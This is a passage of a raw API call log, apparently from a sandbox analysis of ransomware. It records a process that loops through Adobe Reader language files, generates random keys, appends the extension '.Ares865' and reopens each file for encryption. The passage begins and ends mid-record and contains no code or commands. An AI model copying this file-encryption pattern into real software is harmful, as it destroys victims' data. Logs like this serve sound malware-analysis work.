10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_us.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.966] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.966] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.967] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.967] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.978] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.979] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.979] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.980] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_UY.txt" | out: lpString1="DisplayLanguageNames.es_UY.txt") returned="DisplayLanguageNames.es_UY.txt" [0159.980] lstrlenW (lpString="DisplayLanguageNames.es_UY.txt") returned 30 [0159.980] lstrlenW (lpString="Ares865") returned 7 [0159.980] lstrcmpiW (lpString1="_UY.txt", lpString2="Ares865") returned -1 [0159.980] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt.Ares865") returned 115 [0159.980] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt.ares865"), dwFlags=0x1) returned 1 [0159.983] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_UY.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_uy.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.983] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.983] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.984] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.984] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.988] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.989] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.989] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.990] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es_VE.txt" | out: lpString1="DisplayLanguageNames.es_VE.txt") returned="DisplayLanguageNames.es_VE.txt" [0159.990] lstrlenW (lpString="DisplayLanguageNames.es_VE.txt") returned 30 [0159.990] lstrlenW (lpString="Ares865") returned 7 [0159.990] lstrcmpiW (lpString1="_VE.txt", lpString2="Ares865") returned -1 [0159.990] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt.Ares865") returned 115 [0159.990] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt.ares865"), dwFlags=0x1) returned 1 [0159.992] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es_VE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es_ve.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.992] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28360) returned 1 [0159.993] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.993] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.993] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.997] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.997] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.997] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.998] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.es__TRADITIONAL.txt" | out: lpString1="DisplayLanguageNames.es__TRADITIONAL.txt") returned="DisplayLanguageNames.es__TRADITIONAL.txt" [0159.998] lstrlenW (lpString="DisplayLanguageNames.es__TRADITIONAL.txt") returned 40 [0159.998] lstrlenW (lpString="Ares865") returned 7 [0159.998] lstrcmpiW (lpString1="NAL.txt", lpString2="Ares865") returned 1 [0159.999] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt.Ares865") returned 125 [0159.999] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt.ares865"), dwFlags=0x1) returned 1 [0160.000] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.es__TRADITIONAL.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.es__traditional.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.001] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28358) returned 1 [0160.001] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.002] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.002] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.005] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.006] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.006] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.007] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.et.txt" | out: lpString1="DisplayLanguageNames.et.txt") returned="DisplayLanguageNames.et.txt" [0160.007] lstrlenW (lpString="DisplayLanguageNames.et.txt") returned 27 [0160.007] lstrlenW (lpString="Ares865") returned 7 [0160.007] lstrcmpiW (lpString1=".et.txt", lpString2="Ares865") returned -1 [0160.007] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt.Ares865") returned 112 [0160.007] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt.ares865"), dwFlags=0x1) returned 1 [0160.009] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.009] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27486) returned 1 [0160.009] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.010] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.010] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.014] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.014] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.014] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.015] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.et_EE.txt" | out: lpString1="DisplayLanguageNames.et_EE.txt") returned="DisplayLanguageNames.et_EE.txt" [0160.015] lstrlenW (lpString="DisplayLanguageNames.et_EE.txt") returned 30 [0160.015] lstrlenW (lpString="Ares865") returned 7 [0160.015] lstrcmpiW (lpString1="_EE.txt", lpString2="Ares865") returned -1 [0160.016] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt.Ares865") returned 115 [0160.016] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt.ares865"), dwFlags=0x1) returned 1 [0160.017] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.et_EE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.et_ee.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.017] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=27486) returned 1 [0160.018] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.018] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.018] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.022] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.023] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.023] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.024] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.fi.txt" | out: lpString1="DisplayLanguageNames.fi.txt") returned="DisplayLanguageNames.fi.txt" [0160.024] lstrlenW (lpString="DisplayLanguageNames.fi.txt") returned 27 [0160.024] lstrlenW (lpString="Ares865") returned 7 [0160.024] lstrcmpiW (lpString1=".fi.txt", lpString2="Ares865") returned -1 [0160.024] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt.Ares865") returned 112 [0160.024] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt.ares865"), dwFlags=0x1) returned 1 [0160.027] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.028] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28020) returned 1 [0160.028] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.029] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.029] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.032] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.033] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.033] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.034] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.fi_FI.txt" | out: lpString1="DisplayLanguageNames.fi_FI.txt") returned="DisplayLanguageNames.fi_FI.txt" [0160.034] lstrlenW (lpString="DisplayLanguageNames.fi_FI.txt") returned 30 [0160.034] lstrlenW (lpString="Ares865") returned 7 [0160.034] lstrcmpiW (lpString1="_FI.txt", lpString2="Ares865") returned -1 [0160.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt.Ares865") returned 115 [0160.034] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt.ares865"), dwFlags=0x1) returned 1 [0160.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28020) returned 1 [0160.037] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.037] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.037] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.044] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.045] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.fi_FI_PREEURO.txt" | out: lpString1="DisplayLanguageNames.fi_FI_PREEURO.txt") returned="DisplayLanguageNames.fi_FI_PREEURO.txt" [0160.045] lstrlenW (lpString="DisplayLanguageNames.fi_FI_PREEURO.txt") returned 38 [0160.045] lstrlenW (lpString="Ares865") returned 7 [0160.045] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0160.046] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt.Ares865") returned 123 [0160.046] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0160.047] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fi_FI_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fi_fi_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.048] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28026) returned 1 [0160.048] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.049] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.049] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.052] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.053] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.053] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.054] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.fr_CA.txt" | out: lpString1="DisplayLanguageNames.fr_CA.txt") returned="DisplayLanguageNames.fr_CA.txt" [0160.054] lstrlenW (lpString="DisplayLanguageNames.fr_CA.txt") returned 30 [0160.054] lstrlenW (lpString="Ares865") returned 7 [0160.054] lstrcmpiW (lpString1="_CA.txt", lpString2="Ares865") returned -1 [0160.054] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt.Ares865") returned 115 [0160.054] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt.ares865"), dwFlags=0x1) returned 1 [0160.058] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_CA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_ca.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.058] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28488) returned 1 [0160.059] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.059] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.060] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.063] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.063] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.064] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.fr_FR.txt" | out: lpString1="DisplayLanguageNames.fr_FR.txt") returned="DisplayLanguageNames.fr_FR.txt" [0160.064] lstrlenW (lpString="DisplayLanguageNames.fr_FR.txt") returned 30 [0160.064] lstrlenW (lpString="Ares865") returned 7 [0160.064] lstrcmpiW (lpString1="_FR.txt", lpString2="Ares865") returned -1 [0160.065] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt.Ares865") returned 115 [0160.065] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt.ares865"), dwFlags=0x1) returned 1 [0160.066] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.fr_FR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.fr_fr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0160.067] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28488) returned 1 [0160.067] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0160.068] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0160.068] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.073] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0160.073] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0160.073] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0160.074] lstrcpyW (in: lpString1=0x2cce49a, 